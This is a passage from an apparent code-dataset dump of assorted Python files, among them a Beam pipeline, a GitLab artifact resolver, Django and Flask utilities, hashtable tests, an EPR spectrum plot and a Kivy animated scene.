'PROJECT:DATASET.TABLE or DATASET.TABLE.'))\n\n parser.add_argument(\n '--gcs_location',\n required=False,\n help=('GCS Location to store files to load '\n 'data into Bigquery'))\n\n known_args, pipeline_args = parser.parse_known_args(argv)\n\n source_config = relational_db.SourceConfiguration(\n drivername='postgresql+pg8000',\n host='localhost',\n port=5432,\n username='postgres',\n password='pwd',\n database='postgres'\n\n )\n\n\n table_config_teams = relational_db.TableConfiguration(\n name='teams',\n create_if_missing=True, # automatically create the table if not there\n primary_key_columns=['id'] # and use 'id' column as primary key\n )\n\n table_config_category = relational_db.TableConfiguration(\n name='category',\n create_if_missing=True, # automatically create the table if not there\n primary_key_columns=['category_ts'] # and use 'category_ts' column as primary key\n )\n\n with beam.Pipeline(argv=pipeline_args) as p:\n # Read the table rows into a PCollection.\n rows = p | 'read' >> beam.io.ReadFromBigQuery(\n query=\"\"\"\n SELECT id, category FROM `PROJECT_ID.demos.small_teams` limit 1500\"\"\",\n use_standard_sql=True)\n counted= count_categories(rows)\n\n\n # Write the output using a \"Write\" transform that has side effects.\n\n rows | 'Write Teams' >> relational_db.Write(\n source_config=source_config,\n table_config=table_config_teams )\n counted | 'Write Counts' >> relational_db.Write(\n source_config=source_config,\n table_config=table_config_category )\n\n # Run the pipeline (all operations are deferred until run() is called).\n\n\nif __name__ == '__main__':\n logging.getLogger().setLevel(logging.INFO)\n run()\n","sub_path":"bq-postgres.py","file_name":"bq-postgres.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"341184521","text":"import os\nimport sys\nimport requests\n\nSERVER_URL = \"https://gitlab.kwant-project.org\"\nPROJECT_ID = 334\nJOB_NAME = \"build singularity image\"\nIMAGE_PATH = \"build/Singularity.simg\"\nTARGET_FILENAME = \"/etc/singularity_url\"\n\ntry:\n token = os.environ[\"GITLAB_API_TOKEN\"]\n pipeline_id = os.environ[\"CI_PIPELINE_ID\"]\nexcept KeyError as ex:\n print(f\"{ex.args[0]} is undefined, not resolving the Singularity container\",\n file=sys.stderr)\n sys.exit(0)\n\nreq = requests.get(f\"{SERVER_URL}/api/v4/projects/{PROJECT_ID}/pipelines/{pipeline_id}/jobs\",\n headers={\"PRIVATE-TOKEN\": token})\n\nfor job in reversed(req.json()):\n if job[\"name\"] == JOB_NAME:\n with open(TARGET_FILENAME, \"w\") as f:\n print(f\"{SERVER_URL}/api/v4/projects/{PROJECT_ID}/jobs/{job['id']}/artifacts/{IMAGE_PATH}\", file=f)\n sys.exit(0)\n\nprint(f\"Job \\\"{JOB_NAME}\\\" is not found in the CI job\", file=sys.stderr)\nsys.exit(250)\n","sub_path":"main_image/resolve_singularity.py","file_name":"resolve_singularity.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"468077459","text":"# -*- coding: utf-8 -*-\n\"\"\"HTTP exception object.\"\"\"\n\nfrom .http import HTTP_STATUS_CODES\n\n\nclass HTTPException(Exception):\n\n \"\"\"This can be raised from middleware to render an error page.\"\"\"\n\n def __init__(self, code=None, message=None, exception=None):\n if not isinstance(code, int) or code not in HTTP_STATUS_CODES:\n code = 500\n if message is None:\n message = HTTP_STATUS_CODES[code]\n super(HTTPException, self).__init__(message)\n self.status_code = code\n self.message = message\n self.exception = exception\n","sub_path":"malt/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"385227581","text":"def plusOne1(digits):\n return [int(i) for i in str(int(\"\".join([str(i) for i in digits]))+1)]\n\ndef plusOne2(digits):\n s = \"\".join([str(i) for i in digits])\n leftzeros = len(s) - len(str(int(s)))\n return [0]*leftzeros + [int(i) for i in str(int(s)+1)]\n\ndef plusOne(digits):\n if digits[-1] != 9:\n digits[-1] += 1\n else:\n i=-1\n while -i <= len(digits) and (digits[i] == 9):\n digits[i] = 0\n i -= 1\n if i+1 == -len(digits):\n digits = [1] + digits\n else:\n digits[i] += 1\n return digits\n\nlst = [9,9]\nprint(plusOne1(lst))","sub_path":"20201114.py","file_name":"20201114.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"8683873","text":"from functions import functionObj, rosenbrock\nfrom models.optimizers import GoldenSectionSearch\n\nf_x = lambda x: x**2 - 4*x + 4\nf_x_obj = functionObj(f_x)\n\nopt = GoldenSectionSearch(f_x_obj, xtol = 1e-6, maxIter=2e10)\n\nx_min, _ = opt._line_search()\nprint('X: %.9f \\nF_x: %.9f'%(x_min, f_x_obj(x_min)))\nprint('Function evals: %d'%(f_x_obj.fevals - 1))\n","sub_path":"tests/testGR.py","file_name":"testGR.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"642044675","text":"import fileinput\n\nfrom setuptools import setup\nfrom subprocess import run, CalledProcessError, PIPE, DEVNULL\n\n\nPACKAGE_NAME = 'pytib'\n\n\ndef _untagged_dev_version():\n try:\n # parameters to get correct info if light weight tags are used\n r = run(('git', 'describe', '--tags', '--abbrev=0'),\n stdout=PIPE, stderr=DEVNULL, check=True)\n _dev_version = r.stdout.decode().strip()\n except CalledProcessError:\n _dev_version = '0.1.0'\n\n # Used for automatic development versions only!\n r = run(('git', 'rev-parse', 'HEAD'), stdout=PIPE, check=True)\n\n return f'{_dev_version}+git{r.stdout.decode().strip()}'\n\n\ntry:\n # Releases must be done with git tags\n r = run(('git', 'tag', '-l', '--points-at', 'HEAD'),\n check=True, stdout=PIPE, stderr=DEVNULL)\n _version = r.stdout.decode().strip()\n\n # If not, create a development version based on git commit\n if _version == '':\n _version = _untagged_dev_version()\nexcept CalledProcessError:\n _version = _untagged_dev_version()\n\nwith open(f'{PACKAGE_NAME}/__init__.py', 'a') as f:\n f.write(\"__version__ = '%s'\" % _version)\n\ntry:\n setup(\n name='pytib',\n version=_version,\n description='Produce Tibetan unicode from latin script',\n url='https://github.com/ironhouzi/pytib',\n author='Robin Skahjem-Eriksen',\n author_email='robin@skahjem-eriksen.no',\n license='MIT',\n packages=[\n 'pytib',\n ],\n scripts=['ptib'],\n install_requires=[\n 'click',\n ],\n include_package_data=True,\n zip_safe=False\n )\nfinally:\n # remove injected __version__ line so version control is unaffected by build\n for line in fileinput.input(f'{PACKAGE_NAME}/__init__.py', inplace=True):\n if line.startswith('__version__'):\n print('', end='')\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"342181486","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nPython code provided as is.\nMade by Vincent Wieczny, from Chemistry Department, ENS de Lyon, France\nThis code is under licence CC-BY-NC-SA. It enables you to reuse the code by mentioning the orginal author and without making profit from it.\n\"\"\"\n\n#Librairies\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport widgets\nimport scipy.constants as constants\nfrom matplotlib import rc\nimport matplotlib.patches as patches\n\n################################\n### Paramater initialization ###\n################################\n\n#Physical constants\nh=6.62607004e-34 #Planck constant (m2.kg.s-1)\nR=8.314 #Gas constant (J/K/mol)\nT=298.0 #Temperature (K)\neV=1.60e-19 #1 eV in J\n\n#EPR physical constants\ng=2.0023 #Landé g-factor\nmuB=9.274009994e-24 #Bohr magneton (J.T-1)\nnu=9388.2e6 #X-band frequency (Hz)\n\n#EPR magnetic field\nBmin=0 #T\nBmax=0.5 #T\nDeltaBmax=1e-1 #T\n\n# Modulated parameters\nparameters = {'DeltaB' : widgets.FloatSlider(value=0.05, description='$B_1$ $\\mathrm{(T)}$', min=0.03, max=DeltaBmax),\n 'B0' : widgets.FloatSlider(value=0.1, description='$B_0$ $\\mathrm{(T)}$', min=Bmin, max=Bmax)}\n\n#################\n### Functions ###\n#################\n\n#Down-state energy \ndef E_down(B0):\n return -0.5*g*muB*B0\n\n#Up-state energy \ndef E_up(B0):\n return 0.5*g*muB*B0\n\n#Transition energy \ndef E_trans():\n return h*nu\n\n#Resonant magnetic field\ndef B_trans():\n return E_trans()/(g*muB)\n\n#Sigma\ndef sigma(DeltaB):\n return DeltaB/6\n\n\ndef signal_abs(B0,DeltaB):\n return 1/(sigma(DeltaB)*np.sqrt(2*3.1416))*np.exp(-(B0-B_trans())**2/(2*sigma(DeltaB)**2))\n\n#Derivative signal\ndef signal_der(B0,DeltaB):\n return 1/(sigma(DeltaB)*np.sqrt(2*3.1416))*-(B0-B_trans())/sigma(DeltaB)**2*signal_abs(B0,DeltaB)\n\n#===========================================================\n# --- Plot of the updated curves ---------------------------\n#===========================================================\n\n\n## This function is called when the sliders are changed \ndef plot_data(B0,DeltaB):\n \n lines['Absorption spot'].set_data(B0,signal_abs(B0,DeltaB))\n lines['First derivative spot'].set_data(B0,signal_der(B0,DeltaB))\n truc['$Abs_courbe$'].set_data(B,signal_abs(B,DeltaB))\n truc['$Der_courbe$'].set_data(B,signal_der(B,DeltaB))\n truc['$E_\\mathrm{trans}$'].set_data([B0,B0],[-1,1])\n r1.set_transform(mpl.transforms.Affine2D().translate(B0-DeltaB/2,-E_trans()/2)+ax1.transData)\n r1.set_width(DeltaB)\n \n fig.canvas.draw_idle()\n\n\n##===========================================================\n## --- Initialization of the plot ---------------------------\n##===========================================================\n\n#Plot definition\nfig=plt.figure(figsize=(18,8))\n\nax1 = fig.add_axes([0.2, 0.2, 0.35, 0.7])\nax2 = fig.add_axes([0.60, 0.6, 0.35, 0.3])\nax3 = fig.add_axes([0.60, 0.2, 0.35, 0.3])\n\n\n#Plot comments\nfig.suptitle(r'Simulation of an EPR spectrum at X waveband for a free electron',weight='bold')\n\nfig.text(0.01,0.9,r'EPR magnetic field', multialignment='left', verticalalignment='top',weight='bold')\nfig.text(0.01,0.85,r'$B=B_0+B_1 \\ \\cos{(2 \\, \\pi \\, \\nu \\, t)}$', multialignment='left', verticalalignment='top')\nfig.text(0.01,0.82,r'with $\\nu=100 \\ \\mathrm{kHz}$', multialignment='left', verticalalignment='top')\nfig.text(0.01,0.77,r'EPR X band frequency', multialignment='left', verticalalignment='top',weight='bold')\nfig.text(0.01,0.72,r'$\\nu_\\mathrm{X}=9388.2 \\ \\mathrm{MHz}$', multialignment='left', verticalalignment='top')\nfig.text(0.01,0.67,r'EPR spin level energies', multialignment='left', verticalalignment='top',weight='bold')\nfig.text(0.01,0.62,r'Up-state', multialignment='left', verticalalignment='top')\nfig.text(0.01,0.59,r'$E_\\mathrm{up}=\\frac{1}{2} \\, g \\, \\mu_\\mathrm{B} \\, B$', multialignment='left', verticalalignment='top')\nfig.text(0.01,0.54,r'Down-state', multialignment='left', verticalalignment='top')\nfig.text(0.01,0.51,r'$E_\\mathrm{down}=-\\frac{1}{2} \\, g \\, \\mu_\\mathrm{B} \\, B$', multialignment='left', verticalalignment='top')\n\n\nB=np.arange(Bmin,Bmax,0.0005)\n\n\n\n\nif __name__=='__main__':\n \n ax1.plot(B,E_up(B),lw=2,color='red',label='Up-state energy')\n ax1.plot(B,E_down(B),lw=2,color='blue',label='Down-state energy')\n ax1.plot([Bmin,Bmax],[E_trans()/2,E_trans()/2],':',lw=2,color='grey',label='X-band energy') \n ax1.plot([Bmin,Bmax],[-E_trans()/2,-E_trans()/2],':',lw=2,color='grey') \n \n \n ax1.set_xlim(Bmin,Bmax)\n ax1.set_xlabel('$B_0$ $\\mathrm{(T)}$')\n ax1.set_ylabel('$E$ $\\mathrm{(J)}$')\n \n \n ax2.set_xlim(Bmin,Bmax)\n ax2.set_ylim(-10,150)\n ax2.set_yticklabels([])\n ax2.set_xlabel('$B_0$ $\\mathrm{(T)}$')\n ax2.set_ylabel('$Absorption \\ intensity$')\n \n \n ax3.set_xlim(Bmin,Bmax)\n ax3.set_ylim(-1000000,1000000)\n ax3.set_yticklabels([])\n ax3.set_xlabel('$B_0$ $\\mathrm{(T)}$')\n ax3.set_ylabel('$First \\ derivative \\ intensity$')\n \n truc={}\n \n truc['$E_\\mathrm{trans}$'], = ax1.plot([], [],'--',lw=2, color='gray',label='$B_0$')\n truc['$Abs_courbe$'], = ax2.plot([],[],lw=2,color='red',label='Absorption signal')\n truc['$Der_courbe$'], = ax3.plot([],[],lw=2,color='red',label='First derivative signal')\n r1 = ax1.add_patch(patches.Rectangle((0, 0),DeltaBmax,E_trans(), edgecolor = '#000000', facecolor = '#dddddd', fill=True,label='Excitation band'))\n\n lines = {}\n\n lines['Absorption spot'], = ax2.plot([],[],'o',color='black',lw=2)\n lines['First derivative spot'], = ax3.plot([],[],'o',color='black',lw=2)\n \n ax1.legend()\n ax2.legend()\n ax3.legend()\n \n param_widgets = widgets.make_param_widgets(parameters, plot_data, slider_box=[0.20, 0.05, 0.35, 0.05])\n choose_widget = widgets.make_choose_plot(lines,box=[0.01,0.2,0.12, 0.1])\n reset_button = widgets.make_reset_button(param_widgets,box=[0.85, 0.05, 0.10, 0.05])\n \n plt.show()\n","sub_path":"EPR/free_electron_EPR_spectrum/free_electron_EPR_spectrum.py","file_name":"free_electron_EPR_spectrum.py","file_ext":"py","file_size_in_byte":5901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"163997946","text":"import time\nfrom django.db import models\nfrom django.forms import ModelForm, forms\nfrom grants.settings import UPLOAD_USER_FOLDER\nfrom extuser.models import OrgUser\n\n\ndef user_directory_path(instance, filename):\n\t# завантаження відбувається в деректорію MEDIA_ROOT/user_/\n\treturn UPLOAD_USER_FOLDER + '{0}/{1}'.format(instance.user.id, filename)\n\n\nclass FileUser(models.Model):\n\tclass Meta:\n\t\tverbose_name = u'Файл користувача'\n\t\tverbose_name_plural = u'Файли користувачів'\n\t\tdb_table = 'file_name'\n\n\tuser = models.ForeignKey(OrgUser)\n\n\tname_file = models.FileField(\n\t\tverbose_name=u'Повний Шлях Файлу',\n\t\tupload_to=user_directory_path\n\t)\n\tname = models.FileField(\n\t\tverbose_name=u'Назва файлу',\n\t\tdefault=''\n\t)\n\tdate_joined = models.DateTimeField(\n\t\tverbose_name=u'Дата додавання',\n\t\tdefault=time.strftime(\"%Y-%m-%d %H:%M:%S\")\n\t)\n\n\tdef __str__(self):\n\t\treturn u'Файл: {}'.format(str(self.name_file).split('/')[-1])\n\n\tdef __repr__(self):\n\t\treturn u'<{}>'.format(str(self.name_file).split('/')[-1])\n\n\nclass FormFileUser(ModelForm):\n\tclass Meta:\n\t\tmodel = FileUser\n\t\tfields = ['name_file']\n\n\tdef clean_name_file(self):\n\t\tname = self.cleaned_data['name_file']\n\t\tallowed_file = ['pdf', 'PDF', 'jpg', 'jpeg', 'png', 'gif', 'bmp']\n\t\texc = str(name.name.split('.')[-1])\n\t\tname.name = str(name.name).lower().replace(' ', '-').replace('_', '-')\n\t\terror = ''\n\t\tif len(name.name) < 2:\n\t\t\terror += u'Довжина файла не може бути меншою 2х символів!'\n\t\t\traise forms.ValidationError(error)\n\t\texc = [ae for ae in allowed_file if exc == ae]\n\t\tif not exc:\n\t\t\terror += u'Файли з таким розширенням не дозволені!'\n\t\t\traise forms.ValidationError(error)\n\t\treturn name\n\n","sub_path":"fileuser/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"577650186","text":"from collections import deque\n\nimport pytest\n\nfrom hashtable import Hashtable\n\n\ndef test_hash(hashtable):\n \"\"\"\n Hash function gives expected values.\n \"\"\"\n\n key = 'cat'\n\n expected = 8\n actual = hashtable.hash(key)\n\n assert actual == expected\n\n key = 'tac'\n\n actual = hashtable.hash(key)\n\n assert actual == expected\n\n\ndef test_add(hashtable):\n \"\"\"\n Can add a key-value pair to a hashtable.\n \"\"\"\n\n key = 'cat'\n value = 9\n hashtable.add(key, value)\n\n d = deque()\n d.append([key, value])\n\n expected = d[0]\n actual = hashtable.buckets[8][0]\n\n assert actual == expected\n\n\ndef test_add_collision(hashtable):\n \"\"\"\n Can add a key-value pair to a hashtable with collision.\n \"\"\"\n\n keys = ['cat', 'act']\n values = [9, 11]\n d = deque()\n for i in range(len(keys)):\n hashtable.add(keys[i], values[i])\n d.append([keys[i], values[i]])\n\n expected = d[i]\n actual = hashtable.buckets[8][i]\n\n assert actual == expected\n\n\ndef test_contains(hashtable):\n \"\"\"\n Can check a hashtable for a key-value pair.\n \"\"\"\n\n key = 'cat'\n value = 9\n hashtable.add(key, value)\n\n expected = True\n actual = hashtable.contains(key)\n\n assert actual == expected\n\n\ndef test_contains_collision(hashtable):\n \"\"\"\n Can check a hashtable for a key-value pair with hashtable collision.\n \"\"\"\n\n keys = ['cat', 'act']\n values = [9, 11]\n for i in range(len(keys)):\n hashtable.add(keys[i], values[i])\n\n expected = True\n actual = hashtable.contains(keys[1])\n\n assert actual == expected\n\n\ndef test_no_contains(hashtable):\n \"\"\"\n Not all key-value pairs need to be in a hashtable.\n \"\"\"\n\n key = 'cat'\n\n expected = False\n actual = hashtable.contains(key)\n\n assert actual == expected\n\n\ndef test_get(hashtable):\n \"\"\"\n Can get a value from a hashtable.\n \"\"\"\n\n key = 'cat'\n value = 9\n hashtable.add(key, value)\n\n expected = value\n actual = hashtable.get(key)\n\n assert actual == expected\n\n\ndef test_get_collision(hashtable):\n \"\"\"\n Can get a value from a hashtable with a collision\n \"\"\"\n\n keys = ['cat', 'act']\n values = [9, 11]\n for i in range(len(keys)):\n hashtable.add(keys[i], values[i])\n\n expected = values[1]\n actual = hashtable.get(keys[1])\n\n assert actual == expected\n\n\ndef test_no_get(hashtable):\n \"\"\"\n Can't get a value from a hashtbale which isn't in the hashtable.\n \"\"\"\n\n key = 'cat'\n\n expected = None\n actual = hashtable.get(key)\n\n assert actual == expected\n\n\n# Fixtures\n\n\n@pytest.fixture\ndef hashtable():\n \"\"\"\n Hashtable instance.\n \"\"\"\n\n return Hashtable()\n","sub_path":"python/challenges/hashtable/test_hashtable.py","file_name":"test_hashtable.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"533878057","text":"from main import db\nfrom flask import Blueprint\n\ndb_commands = Blueprint(\"db-custom\", __name__)\n\n@db_commands.cli.command(\"create\")\ndef create_db():\n db.create_all()\n print(\"Tables created!\")\n\n@db_commands.cli.command(\"drop\")\ndef drop_db():\n db.drop_all()\n print(\"Tables deleted\")\n \n@db_commands.cli.command(\"seed\")\ndef seed_db():\n from models.Artists import Artists\n from models.User import User\n from main import bcrypt\n from faker import Faker\n import random\n\n faker = Faker()\n # users = []\n\n # for i in range(5):\n # user = User()\n # user.email = f\"test{i}@test.com\"\n # user.password = bcrypt.generate_password_hash(\"123456\").decode(\"utf-8\")\n # db.session.add(user)\n # users.append(user)\n\n # db.session.commit()\n\n for i in range(20):\n artist = Artists()\n artist.name = faker.catch_phrase()\n db.session.add(artist)\n \n db.session.commit()\n print(\"Tables seeded\")","sub_path":"src/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"9893741","text":"# -*- coding:utf-8 _*- \n\"\"\" \n@author:Administrator\n@file: merge_train_data_process.py\n@time: 2018/11/20\n\"\"\"\nimport pandas as pd\n\n\ndata = pd.read_csv('./merge_train_data.csv')\ndata_orgin = data\n\n# print(data.head())\nprint(data.shape)\ndata = data[abs(data.trainPrediction-data.daysOnMarket)<20]\n# print(data.head())\nprint(data.shape)\ndata.to_csv('../input/treb_toronto_3to8_1.csv')\ndata_orgin.to_csv('./orgin_data.csv')\n","sub_path":"first_reporter_task_one_week_finish/test_treb2/test_treb/merge_data_bak/merge_train_data_process.py","file_name":"merge_train_data_process.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"348577486","text":"## CREATED BY:\n## Gert Sterenborg; gertsterenborg@gmail.com\n## 21-01-2015\n\n##imports:\nimport os\nimport json\nimport urllib2\nimport osgeo.ogr, osgeo.osr\n\ndef getLatLng(place):\n ## Fetches coordinates from the google api\n url = \"http://maps.googleapis.com/maps/api/geocode/json?address=\"+place\n response = urllib2.urlopen(url)\n jsonF = json.loads(response.read())\n if jsonF['status'] == \"OK\":\n lat = jsonF['results'][0]['geometry']['location']['lat']\n lng = jsonF['results'][0]['geometry']['location']['lng']\n return lat,lng\n\ndef storeShp(placeDic):\n ## current file location\n path = os.path.dirname(os.path.realpath(__file__))+\"/\"\n ## remove shapefile\n removeShp(path,'places')\n spatialReference = osgeo.osr.SpatialReference()\n spatialReference.ImportFromEPSG(4326) ##WGS84 degrees coordinates\n driver = osgeo.ogr.GetDriverByName('ESRI Shapefile') # will select the driver foir our shp-file creation.\n shapeData = driver.CreateDataSource(path) #so there we will store our data\n layer = shapeData.CreateLayer('places', spatialReference, osgeo.ogr.wkbPoint) #this will create a corresponding layer for our data with given spatial information.\n layer_defn = layer.GetLayerDefn() # gets parameters of the current shapefile\n new_field = osgeo.ogr.FieldDefn('PLACE', osgeo.ogr.OFTString)\n layer.CreateField(new_field)\n point = osgeo.ogr.Geometry(osgeo.ogr.wkbPoint)\n i = 0\n for place in placeDic:\n point.AddPoint(placeDic[place]['lng'],placeDic[place]['lat']) #create a new point at given ccordinates\n featureIndex = i\n feature = osgeo.ogr.Feature(layer_defn)\n feature.SetGeometry(point)\n feature.SetFID(featureIndex)\n j = feature.GetFieldIndex(\"PLACE\")\n feature.SetField(j, place)\n layer.CreateFeature(feature)\n i+= 1\n shapeData.Destroy() #lets close the shapefile\n\ndef removeShp(path,fileName):\n ## removes the exsisting shapefile\n extensions = [\"shp\",\"shx\",\"prj\",\"dbf\"]\n for extension in extensions:\n command = \"rm \"+path+fileName+\".\"+extension\n os.system(command)\n\nif __name__ == \"__main__\":\n placeDic = {} ## dictionary where all the coordinates and places will be stored in\n with open(\"places.txt\") as f:\n for line in f:\n lineSplit = line.split(',')\n for place in lineSplit:\n lat,lng = getLatLng(place.strip())\n placeDic[place.strip()] = {\n 'lat':lat,\n 'lng':lng}\n storeShp(placeDic)\n try: ## show the result in qgis\n os.system(\"qgis places.shp\")\n except:\n pass\n\n \n","sub_path":"PlacesToShape.py","file_name":"PlacesToShape.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"433653077","text":"#!/usr/bin/env python3\n\nimport sys, os\nsys.path.insert(0, os.path.abspath('../lib'))\n\nimport time\nimport random\nimport numpy as np\n\nfrom common.core import BaseWidget, run, lookup\nfrom common.gfxutil import topleft_label, CEllipse, KFAnim, AnimGroup\n\nfrom kivy.uix.image import Image\nfrom kivy.core.image import Image as Img\nfrom kivy.uix.widget import Widget\nfrom kivy.core.window import Window\nfrom kivy.graphics import Color, Ellipse, Rectangle, Line\nfrom kivy.graphics.instructions import InstructionGroup\n\n\nclass InteractiveImage(Image):\n def __init__(self, **kwargs):\n super(InteractiveImage, self).__init__(**kwargs, keep_data=True, allow_stretch=True, keep_ratio=False)\n self.callback = None\n Window.bind(mouse_pos=self.on_mouse_pos)\n\n def set_callback(self, callback):\n self.callback = callback\n\n def collide_point(self, x, y):\n try:\n # Adjust x and y to reflect coordinates within the image\n x = (x - self.x) * self._coreimage.width / self.width\n y = (self.height - (y - self.y)) * self._coreimage.height / self.height\n color = self._coreimage.read_pixel(x, y)\n except:\n color = 0, 0, 0, 0\n if color[-1] > 0:\n return True\n return False\n\n def on_mouse_pos(self, window, pos):\n if self.collide_point(*pos):\n self.color = [1, 1, 1, 0.5]\n else:\n self.color = [1, 1, 1, 1]\n\n def on_touch_down(self, touch):\n if self.collide_point(*touch.pos):\n if not self.callback is None:\n self.callback()\n\n\nclass FadingMusicNote(InstructionGroup):\n def __init__(self, pos=(0, 0)):\n super(FadingMusicNote, self).__init__()\n self.body = Rectangle(pos=pos, size=(50, 50), texture=Img('./data/scene/eightnote.png').texture)\n self.pop_anim = KFAnim((0, self.body.size[0]), (.5, self.body.size[0]), (1.0, 0))\n mag = random.uniform(20, 30)\n theta = random.uniform(0, 2*np.pi)\n dx, dy = mag * np.cos(theta), mag * np.sin(theta)\n self.pos_anim = KFAnim((0, pos[0], pos[1]), (.5, pos[0] + dx, pos[1] + dy))\n self.add(self.body)\n self.time = 0\n self.active = True\n self.on_update(0)\n\n def on_update(self, dt):\n # the disappearing animation just reduces the size\n new_size = self.pop_anim.eval(self.time)\n new_pos = self.pos_anim.eval(self.time)\n self.body.size = (new_size, new_size)\n self.body.pos = new_pos\n self.time += dt\n return self.pop_anim.is_active(self.time)\n\n def start_anim(self):\n self.active = True\n\nclass FlyingCarWidget(Image):\n def __init__(self, init_pos, size, velocity, **kwargs):\n super(FlyingCarWidget, self).__init__(**kwargs)\n self.init_pos = init_pos\n self.size = size\n\n self.velocity = velocity\n self.t = time.time()\n\n self.anim_delay = 0.5\n\n def is_visible(self):\n x, y = self.pos\n w, h = self.size\n\n if self.velocity > 0:\n return x < Window.width\n else:\n return x + w > 0\n\n def on_update(self):\n t = time.time() - self.t\n x_0, y_0 = self.init_pos\n self.pos = (x_0 + self.velocity * t, y_0)\n\nclass FlyingCarGeneratorWidget(BaseWidget):\n\n car_assets = (\n (\"./data/scene/food_truck.gif\", \"./data/scene/food_truck_reverse.gif\"),\n (\"./data/scene/nyan_cat.gif\", \"./data/scene/nyan_cat_reverse.gif\"),\n (\"./data/scene/warp_ship.gif\", \"./data/scene/warp_ship_reverse.gif\"),\n (\"./data/scene/superman.png\", \"./data/scene/superman_reverse.png\"),\n (\"./data/scene/flying_delorean.png\", \"./data/scene/flying_delorean_reverse.png\"),\n )\n\n def __init__(self, y_range):\n super(FlyingCarGeneratorWidget, self).__init__()\n\n self.y_range = y_range\n self.speed = 90 # pixels/sec\n self.cars = []\n\n self.t_next_car = 0\n self.max_cars = 5\n\n def generate_car(self):\n\n # Choose random car asset\n forward, backward = random.choice(self.car_assets)\n\n # Choose randomly between forward and backward\n direction = random.choice([\"forward\", \"backward\"])\n if direction == \"forward\":\n source = forward\n velocity = self.speed * random.uniform(0.8, 1.2)\n x_0 = 0\n else:\n source = backward\n velocity = -self.speed * random.uniform(0.8, 1.2)\n x_0 = Window.width\n\n # Randomly select starting y coordinate\n y_0 = random.uniform(*self.y_range)\n\n # Construct car widget\n car = FlyingCarWidget((x_0, y_0), (100, 100), velocity)\n car.source = source\n self.cars.append(car)\n self.add_widget(car)\n\n\n def on_update(self):\n\n # Process updates for each car\n for car in self.cars:\n car.on_update()\n\n # Check for cars that have gotten\n cars_to_delete = []\n for i, car in enumerate(self.cars):\n if not car.is_visible():\n cars_to_delete.append(i)\n\n # Delete complete cars\n for i in cars_to_delete:\n self.remove_widget(self.cars[i])\n del self.cars[i]\n\n # Generate new cars if there's room and if we haven't\n # recently created a new car\n t_now = time.time()\n if len(self.cars) < self.max_cars and \\\n t_now > self.t_next_car:\n self.generate_car()\n self.t_next_car = t_now + random.uniform(1, 5)\n\nclass BackgroundWidget(BaseWidget):\n def __init__(self):\n super(BackgroundWidget, self).__init__()\n\n # Background\n self.background = Image(allow_stretch=True, keep_ratio=False)\n self.background.source = \"./data/scene/background.png\"\n self.add_widget(self.background)\n\n self.car_generator = FlyingCarGeneratorWidget((100, 500))\n self.add_widget(self.car_generator)\n\n def on_layout(self, win_size):\n self.background.size = win_size\n\n def on_update(self):\n pass\n\nclass ForegroundWidget(BaseWidget):\n def __init__(self):\n super(ForegroundWidget, self).__init__()\n\n # Foreground\n self.foreground = Image(allow_stretch=True, keep_ratio=False)\n self.foreground.source = \"./data/scene/foreground.png\"\n self.add_widget(self.foreground)\n\n # Amp\n self.amp = InteractiveImage()\n self.amp.source = \"./data/scene/amp.png\"\n self.amp.set_callback(lambda: print(\"amp\"))\n self.add_widget(self.amp)\n\n # Guitar\n self.guitar = InteractiveImage()\n self.guitar.source = \"./data/scene/guitar.png\"\n self.guitar.set_callback(lambda: print(\"guitar\"))\n self.add_widget(self.guitar)\n\n # Mic\n self.mic = InteractiveImage()\n self.mic.source = \"./data/scene/mic.png\"\n self.mic.set_callback(lambda: print(\"mic\"))\n self.add_widget(self.mic)\n \n # Radio\n self.radio = InteractiveImage()\n self.radio.source = \"./data/scene/radio.png\"\n self.radio.set_callback(lambda: print(\"radio\"))\n self.add_widget(self.radio)\n \n # File cabinet\n self.storage = InteractiveImage()\n self.storage.source = \"./data/scene/storage.png\"\n self.storage.set_callback(lambda: print(\"storage\"))\n self.add_widget(self.storage)\n\n def on_layout(self, win_size):\n self.foreground.size = win_size\n self.amp.size = win_size\n self.guitar.size = win_size\n self.mic.size = win_size\n self.radio.size = win_size\n self.storage.size = win_size\n \n\nclass Scene(BaseWidget):\n def __init__(self):\n super(Scene, self).__init__()\n\n self.background = BackgroundWidget()\n self.add_widget(self.background)\n\n self.foreground = ForegroundWidget()\n self.add_widget(self.foreground)\n\n # Flying music notes\n self.anim_group = AnimGroup()\n self.canvas.add(self.anim_group)\n self.anim_group.add(FadingMusicNote())\n\n def on_layout(self, win_size):\n self.background.on_layout(win_size)\n self.foreground.on_layout(win_size)\n\n def on_update(self):\n self.anim_group.on_update()\n\n def add_note_sprite(self):\n self.anim_group.add(FadingMusicNote((320, 80)))\n\n\nif __name__ == \"__main__\":\n 